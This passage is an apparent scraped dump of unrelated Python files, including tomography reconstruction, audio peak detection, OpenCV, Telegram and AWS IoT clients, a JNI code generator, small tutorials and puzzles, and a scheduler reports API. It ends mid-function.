u_gen0 = torch.FloatTensor(u_gen0[ind_val1:n_images,:,:,:]) ##################################################################
# gen_zero_dataset_fbp = gen_zero_dataset_fbp[0:n_images,:,:,:].reshape(n_images,128,128,1) ##################################################################
print("u_true.shape = ", u_true.shape)
print("gen_zero_dataset.shape = ", u_gen0.shape)
print("b_data.shape = ", b_data.shape)
print()
print(f'u_true.min(): {u_true.min()}')
print(f'u_true.max(): {u_true.max()}')
print(f'u_gen0.min(): {u_gen0.min()}')
print(f'u_gen0.max(): {u_gen0.max()}')
print()
# ======================================================================================================================
# Load Pretrained Weights
# ======================================================================================================================
# models_path = os.path.join(experiment_path, './checkpoints/')
models_path = experiment_path + '/checkpoints/'
list_files = [name for name in os.listdir(models_path)]
list_files.sort()
# print('list_files:', list_files)
# num_gen = len(list_files) # so the number of files in checkpoints should be the number of generators
num_gen = 20 # pick a spot to stop
list_J = []
# Loading the J's
for idx, filename in enumerate(list_files):
assert(filename[0:5] == 'step_')
# print(f'filename: {filename}')
if idx < 10:
load_J = torch.load(models_path + 'step_0' + str(idx) + '.pth', map_location='cpu')
else:
load_J = torch.load(models_path + 'step_' + str(idx) + '.pth', map_location='cpu')
netD = discriminator_net()
netD.load_state_dict(load_J['state_dict'])
netD.eval()
list_J.append(netD)
# Load the last J for his_wass
if num_gen < 10:
his_wass = torch.load(models_path + 'step_0' + str(num_gen) + '.pth', map_location='cpu')['his_wass']
else:
his_wass = torch.load(models_path + 'step_' + str(num_gen) + '.pth', map_location='cpu')['his_wass']
# ======================================================================================================================
# Load ODL Operators
# ======================================================================================================================
import odl
# extremely important that the correct ODL GitHub functions are available
from odl.contrib import torch as odl_torch
n_mesh = 128
space = odl.uniform_discr([-64, -64], [64, 64], [n_mesh, n_mesh],
dtype='float32')
n_angles = 30
geometry = odl.tomo.parallel_beam_geometry(space, num_angles=n_angles)
fwd_op = odl.tomo.RayTransform(space, geometry)
opnorm = odl.power_method_opnorm(fwd_op)
fwd_op = (1 / opnorm) * fwd_op # normalize fwd operator to be scale-invariant
L = odl.power_method_opnorm(fwd_op.adjoint*fwd_op)
print('fwd_op.adjoint*fwd_op = ', fwd_op.adjoint*fwd_op)
print('L = ', L)
# ======================================================================================================================
# Relaxed Projected Gradient Descent
# min𝑢∈ℝ2𝐻(𝑢)+𝛿(𝑢)=min𝑢∈𝐻(𝑢),
#
# where
#
# 𝐻(𝑢):= 1/2 ‖𝐴𝑢−𝑏‖_2^2.
#
# The iterative method we use to solve this problem is a relaxed version of projected gradient. For 𝜆∈(0,1) and 𝛼∈(0,2/Lip(𝐻)) , we use
#
# u_{k+1} = (1 - kappa) + kappa ⋅ 𝑃(𝑢𝑘− xi ∇𝐻(𝑢𝑘))
# ======================================================================================================================
# computing only one projection:
SSIM0, PSNR0 = utils.compute_avg_SSIM_PSNR(u_true, u_gen0, n_mesh,
data_range[image_scaling])
u1 = proj_M_L2O(u_gen0, list_J, his_wass, gamma_constant, alpha, step_type, device)
relerr1 = torch.norm(u1 - u_true)/torch.norm(u_true)
SSIM1, PSNR1 = utils.compute_avg_SSIM_PSNR(u_true, u1, n_mesh,
data_range[image_scaling])
print(
'relerr1: %.3e PSNR1: %.3e SSIM1: %.3e'
% (relerr1, PSNR1, SSIM1))
u2 = proj_M_L2O(u1, list_J, his_wass, gamma_constant, alpha, step_type, device)
relerr2 = torch.norm(u2 - u_true)/torch.norm(u_true)
SSIM2, PSNR2 = utils.compute_avg_SSIM_PSNR(u_true, u2, n_mesh,
data_range[image_scaling])
print(
'relerr2: %.3e PSNR2: %.3e SSIM2: %.3e'
% (relerr2, PSNR2, SSIM2))
uk = u_gen0.clone()
yk = torch.zeros(uk.shape)
kappa = 1e-1
n_samples = uk.shape[0]
max_iters = 10
xi = 8e-2 / L
print('\n\n' + experiment_path)
print('n_images = ', n_images)
print('\n\n ----------- Relaxed Projected Gradient Descent ----------- \n')
print('kappa: %.2e max_iters: %.d xi: %.2e alpha: %.2e num_gen: %d'
% (kappa, max_iters, xi, alpha, num_gen))
for k in range(max_iters):
start_time = time.time()
Auk = odl_torch.OperatorFunction.apply(fwd_op, uk)
grad_H_uk = odl_torch.OperatorFunction.apply(fwd_op.adjoint, Auk - b_data)
yk = uk - xi * grad_H_uk
# # 𝑃𝜆(𝑢):=(1−𝜆)𝑢 + lam * P(u - lam ( grad) .
uk = (1-kappa) * uk + kappa * proj_M_L2O(yk, list_J, his_wass, gamma_constant, alpha, step_type, device)
relerr = torch.norm(uk - u_true)/torch.norm(u_true)
SSIM, PSNR = utils.compute_avg_SSIM_PSNR(u_true, uk, n_mesh,
data_range[image_scaling])
plt.figure()
suptitle_str = 'k = ' + str(k + 1)
plt.suptitle(suptitle_str)
plt.subplot(2, 2, 1)
plt.imshow(u_gen0[0, 0, :, :], clim=(0, 1))
plt.title('u0' + ', siim:{:.2f}'.format(SSIM0) + ', psnr:{:.2f}'.format(PSNR0))
plt.colorbar()
plt.subplot(2, 2, 2)
plt.imshow(u_true[0, 0, :, :], clim=(0, 1))
plt.title('u_true')
plt.colorbar()
plt.subplot(2, 2, 3)
plt.imshow(u1[0, 0, :, :], clim=(0, 1))
plt.title('PM(u0)' + ', siim:{:.2f}'.format(SSIM1) + ', psnr:{:.2f}'.format(PSNR1))
plt.colorbar()
plt.subplot(2, 2, 4)
plt.imshow(uk[0, 0, :, :], clim=(0, 1))
uk_title_str = 'u' + str(k + 1) + ', siim:{:.2f}'.format(SSIM) + ', psnr:{:.2f}'.format(PSNR)
plt.title(uk_title_str)
plt.colorbar()
plt.show()
end_time = time.time()
t_iter = end_time - start_time
# compute Relative Error, SSIM and PSNR
print(
'%d relerr: %.3e PSNR: %.3e SSIM: %.3e time: %.3f'
% (k+1, relerr, PSNR, SSIM, t_iter))
# create and save gray image
cmap = 'gray'
fig = plt.figure()
plt.imshow(np.rot90(uk[0,0,:,:].detach().cpu().numpy()),cmap=cmap)
plt.axis('off')
save_loc = './saved_images/adv_proj_ellipse_ind' + str(ind_val1) + '.pdf'
plt.savefig(save_loc,bbox_inches='tight')
plt.show()
# plt.close(fig)
|
import signin
import requests
import config
import problem
from bs4 import BeautifulSoup
def get_problem_list(cookies):
url = config.base_url + "domjudge2/pctjury/pctproblems.php"
r = requests.get(url, cookies=cookies)
soup = BeautifulSoup(r.text, "lxml")
tr = soup.find_all("tr")[2:]
lists = [ [x.td.a.text, x.td.next.next.next.a.text ] for x in tr]
lists.sort()
for x in lists:
problem.get(x[1])
if __name__ == "__main__":
cookies = signin.load_cookies()
get_problem_list(cookies)
|
# ---------------------------------------------------------------------------------------------------------------------#
from scipy.io import wavfile
import numpy as np
import math
# ---------------------------------------------------------------------------------------------------------------------#
def location(arg1):
arg3 = []
for k in range(len(arg1)):
if arg1[k] != 0:
arg3.append(k)
return arg3
# ---------------------------------------------------------------------------------------------------------------------#
audio_file = "F:\Projects\Active Projects\Project Intern_IITB\Rough_Space_5\InputTestFile.wav"
window_dur = 30 # Duration of window in milliseconds
hop_dur = 10 # Hop duration in milliseconds
fs, data = wavfile.read(audio_file) # Reading data from wav file in an array
data = data / float(2 ** 15) # Normalizing it to [-1,1] range from [-2^15,2^15]
window_size = int(window_dur * fs * 0.001) # Converting window length to samples
hop_size = int(hop_dur * fs * 0.001) # Converting hop length to samples
window_type = np.hamming(window_size) # Window type: Hamming (by default)
no_frames = int(math.ceil(len(data) / (float(hop_size)))) # Determining the number of frames
zero_array = np.zeros(window_size) # Appending appropriate number of zeros
data = np.concatenate((data, zero_array))
length = len(data) # Finding length of the actual data
# ---------------------------------------------------------------------------------------------------------------------#
# ---------------------------------------------------------------------------------------------------------------------#
noise_energy = 0
energy = [0] * length
# Squaring each data point
for j in range(length):
energy[j] = data[j] * data[j]
# Calculating noise energy
for j in range(0, 800): # energy
noise_energy += energy[j]
noise_energy /= 800
# ---------------------------------------------------------------------------------------------------------------------#
# ---------------------------------------------------------------------------------------------------------------------#
st_energy = [0] * no_frames
maximum = [0] * no_frames
frame_number = [0] * no_frames
start = [0] * no_frames
stop = [0] * no_frames
# Calculating frame wise short term energy
for i in range(no_frames):
frame = data[i * hop_size:i * hop_size + window_size] * window_type
frame_number[i] = i
start[i] = i * hop_size
stop[i] = i * hop_size + window_size
st_energy[i] = sum(frame ** 2)
# ---------------------------------------------------------------------------------------------------------------------#
# ---------------------------------------------------------------------------------------------------------------------#
peak = []
for j in range(no_frames):
if j == 0:
if st_energy[j] > st_energy[j + 1]:
peak.append(st_energy[j])
else:
peak.append(0)
elif j == no_frames - 1:
if st_energy[j] > st_energy[j - 1]:
peak.append(st_energy[j])
else:
peak.append(0)
else:
if st_energy[j] > st_energy[j + 1] and st_energy[j] > st_energy[j - 1]:
peak.append(st_energy[j])
else:
peak.append(0)
# ---------------------------------------------------------------------------------------------------------------------#
# Finding the valleys
valley = []
for j in range(no_frames):
if j == 0:
if st_energy[j] < st_energy[j + 1]:
valley.append(st_energy[j])
else:
peak.append(0)
elif j == no_frames - 1:
if st_energy[j] < st_energy[j - 1]:
valley.append(st_energy[j])
else:
peak.append(0)
else:
if st_energy[j] < st_energy[j + 1] and st_energy[j] < st_energy[j - 1]:
valley.append(st_energy[j])
else:
peak.append(0)
# ---------------------------------------------------------------------------------------------------------------------#
location_peak = location(peak)
location_valley = location(valley)
print "Number of peaks :", len(location_peak)
print "Number of valleys :", len(location_valley)
# ---------------------------------------------------------------------------------------------------------------------#
peak_1 = peak[:]
valley_1 = valley[:]
location_peak_1 = location_peak[:]
location_valley_1 = location_valley[:]
# ---------------------------------------------------------------------------------------------------------------------#
threshold = 0.04 * (noise_energy + (sum(peak) / len(location_peak_1)))
# ---------------------------------------------------------------------------------------------------------------------#
for j in range(len(peak)):
if threshold < peak[j]:
peak.pop(j)
peak.insert(j, 0)
for j in range(len(peak) - 10):
if peak[j] is not 0:
for i in range(1, 10):
if peak[j] < peak[j + i]:
peak.pop(j)
peak.insert(j, 0)
location_peak = location(peak)
location_valley = location(valley)
# ---------------------------------------------------------------------------------------------------------------------#
peak_2 = peak[:]
valley_2 = valley[:]
location_peak_2 = location_peak[:]
location_valley_2 = location_valley[:]
# ---------------------------------------------------------------------------------------------------------------------#
location = location_peak + location_valley
location.sort()
ripple = []
# for k in range(len(location_peak)):
# q = location.index(location_peak[k])
# print q
# # ripple.append(location[q-1])
# # ripple.append(location[q])
# # ripple.append(location[q+1])
# # #
# # # ripple_value = []
# # for k in range(1, len(ripple), 3):
# # ripple_value.append((st_energy[ripple[k]]-st_energy[ripple[k+1]])/(st_energy[ripple[k]]-st_energy[ripple[k-1]]))
# #
# # for q in range(len(ripple_value)-1):
# # if ((ripple_value[q] > 3) and (ripple_value[q+1] < 1.4)) or ((ripple_value[q] > 1.02) and (ripple_value[q+1] < 0.3)):
# # if peak[location_peak[q]] > peak[location_peak[q+1]]:
# # peak.pop(location_peak[q+1])
# # peak.insert(location_peak[q+1], 0)
# #
# # if peak[location_peak[q]] < peak[location_peak[q + 1]]:
# # peak.pop(location_peak[q])
# # peak.insert(location_peak[q], 0)
|
def excel_column_number(s):
ret = 0
base = 1
for c in s[::-1]:
ret += (ord(c) - ord('A') + 1) * base
base *= 26
return ret
#print(excel_column_number('AA'), excel_column_number('ZA'), excel_column_number('AAA'))
coolshell = excel_column_number('COOLSHELL')
shell = excel_column_number('SHELL')
print('coolshell = ', coolshell, 'shell = ', shell)
print('coolshell / shell = ', coolshell / shell) # 85165, cool, but you should covert the number to string!
def excel_column(n):
ret = ''
while n > 0:
n, r = (0, 26) if n == 26 else divmod(n, 26)
#print(n, r)
ret = chr(r + ord('A') - 1) + ret
return ret
#print(excel_column(1), excel_column(27), excel_column(677))
ans = excel_column(85165)
print('85165: ', ans) # DUYO
print('answer is ', ans.lower())
|
#coding:utf-8
#仿射变换
#在仿射变换中,原始图像中的所有平行线仍将在输出图像中平行。为了找到变换矩阵,
# 我们需要输入图像及其在输出图像中的相应位置中的三个点。然后cv.getAffineTransform将创建一个2x3矩阵,这是要传递给cv.warpAffine。
import cv2 as cv
import numpy as np
img = cv.imread('D:/python_file/Opencv3_study_file/images/!face.png')
rows,cols,ch = img.shape
#旋转前的点
pts1 = np.float32([[50,50],[200,50],[50,200]])
#旋转后的点
pts2 = np.float32([[10,100],[200,50],[100,250]])
M = cv.getAffineTransform(pts1,pts2)
dst = cv.warpAffine(img,M,(cols,rows))
cv.imshow('OUTPUT',dst)
cv.waitKey(0)
cv.destroyAllWindows() |
import requests
import xml.etree.ElementTree as ET
from telegram import KeyboardButton
import regex
import random
from stuff import feels, ssHeaders, emotions
import sqlite3
from config import DB_FILE
def generateKeyboard():
events = "https://www.finnkino.fi/xml/Events/?listType=ComingSoon&includeVideos=false"
s = requests.Session()
res = s.get(events)
root = ET.fromstring(res.text)
keyboard = []
for child in root:
for i in child:
if i.tag == "Title":
keyboard.append(KeyboardButton(i.text))
return keyboard
def getMovie(name):
events = "https://www.finnkino.fi/xml/Events/?listType=ComingSoon&includeVideos=false"
s = requests.Session()
res = s.get(events)
root = ET.fromstring(res.text)
movieFound = False
for child in root:
for i in child:
debug = i.tag
debug2 = i.text
if i.tag == "Title" and i.text == name:
movieFound = True
if i.tag == "dtLocalRelease" and movieFound:
return i.text
return "Ensi-iltaa ei löytynyt"
def getImage():
rng = random.randint(0,1)
if rng == 0:
feeling = random.choice(feels) + "+" + random.choice(["man", "men", "woman", "women", "boy", "boys", "girl", "girls"])
url = "https://www.shutterstock.com/fi/search/"+feeling
else:
url = "https://www.shutterstock.com/fi/search/" + random.choice(emotions)
res = requests.get(url, headers=ssHeaders, timeout=3)
re = regex.compile(r'src="(https://image.shutterstock.com/image-[(?:photo)(?:vector)]+/.+?)"')
imageList = re.findall(res.text)
if imageList:
imgUrl = random.choice(imageList)
return imgUrl
else:
return ""
def dbQuery(query, params=()):
conn = sqlite3.connect(DB_FILE)
cur = conn.cursor()
if len(params) == 0:
cur.execute(query)
else:
cur.execute(query, params)
res = cur.fetchall()
conn.close()
return res
def create_tables():
conn = sqlite3.connect(DB_FILE)
c = conn.cursor()
c.execute('''CREATE TABLE IF NOT EXISTS substantiivit ("sub" text)''')
c.execute('''CREATE TABLE IF NOT EXISTS pinned ("date" text, "name" text, "text" text)''')
c.execute('''CREATE TABLE IF NOT EXISTS sananlaskut ("teksti" text)''')
c.execute('''CREATE TABLE IF NOT EXISTS adjektiivit ("adj" text)''')
c.execute('''CREATE TABLE IF NOT EXISTS quotes (
"date" TEXT DEFAULT CURRENT_TIMESTAMP,
"quotee" TEXT,
"quote" TEXT,
"adder" TEXT,
"groupID" INT,
PRIMARY KEY(quotee, quote, groupID)
)
''')
conn.close()
def build_menu(buttons,
n_cols,
header_buttons=None,
footer_buttons=None):
menu = [buttons[i:i + n_cols] for i in range(0, len(buttons), n_cols)]
if header_buttons:
menu.insert(0, [header_buttons])
if footer_buttons:
menu.append([footer_buttons])
return menu
|
import os
import gdown
import zipfile
#url = 'https://drive.google.com/file/d/1CmrRt4Uyl3lGTgYKMWkouzfGPU_W47Nj/view?usp=sharing'
URL = 'https://drive.google.com/uc?id=1CmrRt4Uyl3lGTgYKMWkouzfGPU_W47Nj'
OUTPUT = '../DATASET/modelamiento.zip'
DATA_PATH = '../DATASET/'
if not os.path.exists(OUTPUT):
print('download file')
gdown.download(URL,OUTPUT, quiet=False)
else:
print('modelamiento.zip already exists')
if not os.path.exists(os.path.join(DATA_PATH,'NEW_DATASET')):
with zipfile.ZipFile(OUTPUT, 'r') as zip_ref:
zip_ref.extractall(DATA_PATH)
print('Finished success') |
from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient
import time
loop = True;
def customCallback(client, userdata, message):
print("Received a new message: ")
print(message.payload)
print("from topic: ")
print(message.topic)
myMQTTClient.publish("myTopicPublish", "Chris Recived", 0)
print("--------------\n\n")
loop = False;
myMQTTClient = AWSIoTMQTTClient("Chris_Macbook")
myMQTTClient.configureEndpoint("a1g9fizbnjxy2u.iot.us-west-2.amazonaws.com", 443)
myMQTTClient.configureCredentials("/Users/yuxuanwu/Desktop/IoT/Amazon_Root_CA_1.pem", "/Users/yuxuanwu/Desktop/IoT/cf09431bee-private.pem.key", "/Users/yuxuanwu/Desktop/IoT/cf09431bee-certificate.pem.crt")
# For Websocket, we only need to configure
myMQTTClient.configureOfflinePublishQueueing(-1) # Infinite offline Publish queueing
myMQTTClient.configureDrainingFrequency(2) # Draining: 2 Hz
myMQTTClient.configureConnectDisconnectTimeout(10) # 10 sec
myMQTTClient.configureMQTTOperationTimeout(5) #
myMQTTClient.connect()
#myMQTTClient.publish("myTopic", "Chris IoT Test", 0)
myMQTTClient.subscribe("myTopicListen", 1, customCallback)
while loop:
time.sleep(1)
|
class MethodNode:
def __init__(self, name, methodInfo, className, classMapping=None):
self._name = name
self._methodInfo = methodInfo
self._className = className
self._classMapping = classMapping
def getJNIName(self):
return u"j" + self._name + "_"
def isPublic(self):
return "public" in self._methodInfo['modifiers']
def isStatic(self):
return "static" in self._methodInfo['modifiers']
def signature(self):
res = self._methodInfo['result'].toString()
if self.isStatic():
res = u"static " + res
res += u" " + self._name + u"("
assert len(self._methodInfo['params']) == len(self._methodInfo['paramsType'])
for i in range(len(self._methodInfo['params'])):
res += self._methodInfo['paramsType'][i].toString() + u" " + self._methodInfo['params'][i]
if i < len(self._methodInfo['params']) - 1:
res += u", "
res += u");"
return res
def headerIncludes(self):
res = self._methodInfo['result'].getHeaders()
for t in self._methodInfo['paramsType']:
res.update(t.getHeaders())
return res
def isVoid(self):
return self._methodInfo['result'].isVoid()
def bodyAndSignature(self):
res = self._methodInfo['result'].toString()
res += u" " + self._className + u"::" + self._name + u"("
assert len(self._methodInfo['params']) == len(self._methodInfo['paramsType'])
for i in range(len(self._methodInfo['params'])):
res += self._methodInfo['paramsType'][i].toString() + u" " + self._methodInfo['params'][i]
if i < len(self._methodInfo['params']) - 1:
res += u", "
res += u") {\n"
res += self.getJNIPackArgs()
if not self.isVoid():
res += u" " + self._methodInfo['result'].toCPPJType()
res += " jres = "
else:
res += u" "
if self._methodInfo['result']._type == "String":
res += u"(jstring)"
res += u"JNISingleton::env()->" + self.getJNIMethodCaller() + u"("
if self.isStatic():
res += u"jclass_,"
else:
res += u"jthis_, "
res += self.getJNIName()
for a in self._methodInfo['params']:
res += ', ' + self.argToJ(a)
res += u");\n"
if not self.isVoid():
res += self.getJNIUnpackResult()
res += u"}"
return res
def getJNIMethodFindFunction(self):
if "static" in self._methodInfo['modifiers']:
return "GetStaticMethodID"
else:
return "GetMethodID"
def getJNIMethodSignature(self):
res = u"("
for arg in self._methodInfo["paramsType"]:
isSimpleType = arg.isSimpleType()
resT = arg.typeJNISignature()
if not isSimpleType:
if not arg.isArray():
res += "L" + resT
else:
res += resT[0] + "L" + resT[1:]
else:
res += resT
if not isSimpleType:
res += u";"
res += u")"
resSimple = self._methodInfo["result"].isSimpleType() or self._methodInfo["result"].isVoid()
if not resSimple:
res += u"L"
res += self._methodInfo["result"].typeJNISignature()
if not resSimple:
res += u";"
return res
def getJNIMethodFindLine(self, intend=4):
res = u" " * intend
res += self.getJNIName() + u" = JNISingleton::env()->"
res += self.getJNIMethodFindFunction() + u"("
res += u"jclass_, \"" + self._name + u"\", "
res += u"\"" + self.getJNIMethodSignature() + u"\");\n"
return res
def getJNIUnpackResult(self, intend=4):
res = u" " * intend + self._methodInfo['result'].toString() + u" res;\n"
res += self._methodInfo['result'].typeUnpack(u"jres", "res")
res += u" " * intend + u"return res;\n"
return res
def argToJ(self, argName):
return u"j" + argName
def getJNIPackArgs(self, intend=4):
res = u""
intendStr = u" " * intend
for i in range(len(self._methodInfo["paramsType"])):
res += intendStr + self._methodInfo["paramsType"][i].toCPPJType() + u" "
res += intendStr + self.argToJ(self._methodInfo["params"][i]) + u";\n"
res += self._methodInfo["paramsType"][i].typePack(self.argToJ(self._methodInfo["params"][i]),
self._methodInfo["params"][i])
res += u"\n"
if self._methodInfo["paramsType"]:
res += u"\n"
return res
def getJNIMethodCaller(self):
res = u"Call"
if self.isStatic():
res += u"Static"
res += self._methodInfo['result'].getJNIMethodReturnType()
res += u"Method"
return res |
# File Objects
# method for opening files without a context manager (not recommended)
# when using this method we will ne to explicitly close it when done
# if you don't then you can end up with file leaks that run over the max file descriptors on system
# f = open("test.txt", "r") #if file isn't in the same directory then the full path will be needed
# print(f.name) # prints file name = test.txt
# print(f.mode) # prints the mode the file is open in = r
#
# f.close() # closes the file
# opening with a context manager - don't need to worry about closing
with open("test.txt", "r") as f: # --> f = open("test.txt", "r")
# for line in f:
# print(line, end = "") # this is memory efficient because it doesn't read the whole file at once
# f_contents = f.read() # .read reads the whole file
# print(f_contents) # prints the contents of the file
# f_contents = f.readlines() # .readlines produces a list of all the lines
# f_contents = f.readline() # grabs the first entry from a list of all the lines
# print(f_contents)
# if repeated with the same variable name it wil go on to the next index
# but if given a new variable it will start over again
# print statement needs to be repeated after each otherwise it will only print the last one
# f_contents = f.read(100) # first 100 characters of file
# print(f_contents)
# size_to_read = 10
# f_contents = f.read(size_to_read) # first 10 characters of file as set by variable
# print(f.tell()) # what position we are in the file
size_to_read = 10
f_contents = f.read(size_to_read) # first 10 characters of file as set by variable
print(f_contents)
f.seek(0) # sets us back at 0 index
f_contents = f.read(size_to_read) # will start back at 0 because of .seek()
print(f_contents)
# while len(f_contents) > 0:
# print(f_contents, end = "*") # will put in a * after every 10 characters
# f_contents = f.read(size_to_read)
print(f.closed) # True --> meaning you have to work with the file from within the with open
|
from os import linesep
file_list = ["p.py"]
def clear_file(filename):
'''
Funkcja usuwa białe znaki z końca linii we wskazanym pliku.
'''
new_lines = []
with open(filename, 'rt') as ifile:
lines = ifile.readlines()
for (index, line) in enumerate(lines):
newline = line.rstrip()
if newline != line.rstrip(linesep):
print "{}: {}".format(index+1, repr(line))
new_lines.append(newline)
with open(filename, 'wt') as ofile:
for line in new_lines:
ofile.write(line+linesep)
for f in file_list:
clear_file(f)
|
import encodings
UTF8 = encodings.utf_8.getregentry().name
|
import pandas
from pandas import read_excel
from datetime import datetime
from ..models import Employee, Contact, UpdateLog, Department, Lecturer
def import_data(excel_filename):
wb = read_excel(excel_filename, header=0)
wb = wb.where(pandas.notnull(wb), None)
for idx, row in wb.iterrows():
email = row['email']
if Employee.objects(email=email).first():
continue # skip existing employee
first_name_en = row['first_name_en']
last_name_en = row['last_name_en']
first_name_th = row['first_name_th']
last_name_th = row['last_name_th']
dob = row['dob']
employed_date = row['employed_date']
department_slugs = row['department']
photo_file = row['photo']
building_name_en = row['building_name_en']
building_name_th = row['building_name_th']
building_campus_en = row['building_campus_en']
building_campus_th = row['building_campus_th']
building_address_en = row['building_address_en']
building_address_th = row['building_address_th']
office_number = row['office_number']
cellphone = row['cellphone']
academic_title = row['academic_title']
degree = row['degree']
added_by = row['added_by']
phone_number = row['phone_number']
phone_number = str(phone_number).split(',') if phone_number else []
adder = Employee.objects(email=added_by).first()
contact = Contact(office_number=str(office_number),
phone_number=phone_number,
cellphone=str(cellphone),
building_name_en=building_name_en,
building_name_th=building_name_th,
building_campus_en=building_campus_en,
building_campus_th=building_campus_th,
building_address_en=building_address_en,
building_address_th=building_address_th)
update = [UpdateLog(updated_by=adder)]
departments = []
for slug in department_slugs.split(','):
departments.append(Department.objects(slug=slug).first())
lecturer = Lecturer(first_name_en=first_name_en,
last_name_en=last_name_en,
first_name_th=first_name_th,
last_name_th=last_name_th,
email=email,
dob=dob,
employed_date=employed_date,
academic_title=academic_title,
highest_degree=degree,
contact=contact,
department=departments,
added_by=adder,
update_logs=update
)
if photo_file:
lecturer.photo.put(open(photo_file, 'rb'), content_type='image/jpg')
lecturer.save()
|
# -*- coding: utf-8 -*-
from functools import lru_cache
class Solution:
def numDistinct(self, s: str, t: str) -> int:
return self._numDistinct(s, t, 0, 0)
@lru_cache(maxsize=None)
def _numDistinct(self, s: str, t: str, i: int, j: int) -> bool:
if i == len(s) and j < len(t):
return 0
elif j == len(t):
return 1
elif s[i] == t[j]:
return self._numDistinct(s, t, i + 1, j) + self._numDistinct(
s, t, i + 1, j + 1
)
return self._numDistinct(s, t, i + 1, j)
if __name__ == "__main__":
solution = Solution()
assert 3 == solution.numDistinct("rabbbit", "rabbit")
assert 5 == solution.numDistinct("babgbag", "bag")
|
from ft232h.wrapper import FT232
from ft232h.dll_h import *
from ft232h.spi import SPI
from ft232h.i2c import I2C
def list_info():
dev = FT232(None)
infos = dev.get_devinfos()
for i in infos:
if i['Type'] == 8:
print(i)
def spi_test():
spi = SPI()
#spi speed 1M
# spi config to mode 3
spi.spi_open(1000000, 3, serialnum='FT0B0UCU')
# spi write b'1234' and read back 4 bytes
spi.SPI_WriteRead(b'1234',4)
def i2c_test():
i2c = I2C()
#speed 400k
i2c.i2c_open(400000)
# i2c write b'1234' and read back 4 bytes to slave7bitaddr 0x82
i2c.i2c_FastWrite(0x82>>1, b'1234')
rec = i2c.i2c_FastRead(0x82>>1, 4)
print(rec)
if __name__ == '__main__':
#list_info()
#spi_test()
i2c_test()
|
#%%
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
##### 2015 미세먼지 데이터
data=pd.read_csv('2015_data.csv',encoding="cp949") # CSV파일을 불러오는 함수를 이용
# print(data.tail())
data_seoul=data[data.Location.isin(['서울'])] #location 서울인 데이터만 저장
# print(data_seoul.tail())
# print(data_seoul.corr()) # 상관관계 분석
import seaborn as sns
# sns.set(font_scale=1.5)
# f, ax = plt.subplots(figsize=(20,10))
# seaborn라이브러리를 이용해 heatmap표현 : annot=각 변수 표현, cmap RdBu= 양-붉은색, 음-푸른색
# sns_heatmap=sns.heatmap(data_seoul.corr(),annot=True, fmt=".2f", linewidths=.5, cmap="RdBu_r")
###### 날씨 데이터
data=pd.read_csv('total_weather.csv', encoding="cp949")
# print("데이터의 총 수", len(data))
# print(data.tail())
data_seoul=data[data.Location.isin(['서울'])]
date_dict = {"01":"겨울","02":"겨울","03":"봄", "04":"봄", "05":"봄", "06":"여름", "07":"여름", "08":"여름", "09":"가을","10":"가을","11":"가을","12":"겨울"}
data_seoul['Season']=data_seoul.Date.str[5:7].map(date_dict)
print(data_seoul.tail())
data_seoul=data_seoul[data_seoul.Season.isin(['겨울'])]
# # data_seoul.tail()
sns.set(font_scale=1.5)
f, ax = plt.subplots(figsize=(20,10))
sns_heatmap = sns.heatmap(data_seoul.corr(), annot=True, fmt=".2f", linewidths=.5, cmap="RdBu_r")
#%% |
"""
Alias for `phiml.math.magic`
"""
from phiml.math.magic import *
|
import sys
user_inp=input("Please enter the file you want to open")
try:
file=open(user_inp,"r")
except FileNotFoundError:
print("Bad File Name Sorry.")
sys.exit()
story=""
for line in file:
word_list=word.split()
for word in word_list:
if word[0]=="[":
last=word.find("]")
q=word[1:last]
q=q.replace("-"," ")
after=word[(last+1):]
if q[0] in "aeiou":
article="an"
else:
article="a"
print("Please give",article,q)
blank=input()
story+=blank+after+" "
else:
story+=word+" "
file.close()
print("Here's your story:\n")
print("------------------\n")
print(story) |
"""Implementation of scheduler reports API.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import fnmatch
import logging
import time
import kazoo.exceptions
from treadmill import context
from treadmill import exc
from treadmill import reports
from treadmill import zknamespace as z
from treadmill import logcontext as lc
from treadmill import scheduler as tm_sched
from treadmill.scheduler import loader
from treadmill.scheduler import zkbackend
_LOGGER = logging.getLogger(__name__)
_CACHE_TIMEOUT = 180 # 3 mins
_LAST_CACHE_UPDATE = 0
_RO_SHEDULER_INSTANCE = None
def get_readonly_scheduler():
"""Prepare a readonly master."""
# C0103(invalid-name): invalid variable name
# W0603(global-statement): using the global statement
# pylint: disable=C0103,W0603
global _RO_SHEDULER_INSTANCE, _LAST_CACHE_UPDATE
if (time.time() - _LAST_CACHE_UPDATE > _CACHE_TIMEOUT or
not _RO_SHEDULER_INSTANCE):
tm_sched.DIMENSION_COUNT = 3
_RO_SHEDULER_INSTANCE = loader.Loader(
zkbackend.ZkReadonlyBackend(context.GLOBAL.zk.conn),
context.GLOBAL.cell
)
_RO_SHEDULER_INSTANCE.load_model()
_LAST_CACHE_UPDATE = time.time()
return _RO_SHEDULER_INSTANCE
def mk_explainapi():
"""API factory function returning _ExplainAPI class."""
class _ExplainAPI(object):
"""API object implementing the scheduler explain functionality."""
def __init__(self):
self.get = _explain
return _ExplainAPI
class API(object):
"""Scheduler reports API."""
def __init__(self):
def get(report_type, match=None, partition=None):
"""Fetch report from ZooKeeper and return it as a DataFrame."""
try:
data, _meta = context.GLOBAL.zk.conn.get(
z.path.state_report(report_type)
)
df = reports.deserialize_dataframe(data)
if match:
df = _match_by_name(df, report_type, match)
if partition:
df = _match_by_partition(df, partition)
return df
except kazoo.exceptions.NoNodeError:
raise KeyError(report_type)
self.get = get
self.explain = mk_explainapi()()
def _match_by_name(dataframe, report_type, match):
"""Interpret match with report type and return resulting DataFrame.
"""
pk_match = {
'allocations': 'name',
'apps': 'instance',
'servers': 'name'
}
match = fnmatch.translate(match)
subidx = dataframe[pk_match[report_type]].str.match(match)
return dataframe.loc[subidx].reset_index(drop=True)
def _match_by_partition(dataframe, partition):
"""Filter out dataframes that don't match partition.
"""
partition = fnmatch.translate(partition)
subidx = dataframe['partition'].str.match(partition)
return dataframe.loc[subidx].reset_index(drop=True)
def _explain(inst_id):
"""Explain application placement"""
with lc.LogContext(_LOGGER, inst_id):
start = time.time()
ro_scheduler = get_readonly_scheduler()
_LOGGER.info('ro_scheduler was ready in %s secs', time.time() - start)
try:
instance = ro_scheduler.cell.apps[inst_id]
except KeyError:
raise exc.NotFoundError(inst_id)
if instance.server:
raise exc.FoundError(
'instance {} is already placed on {}'.format(
inst_id, instance.server
)
)
return reports.explain_placement(
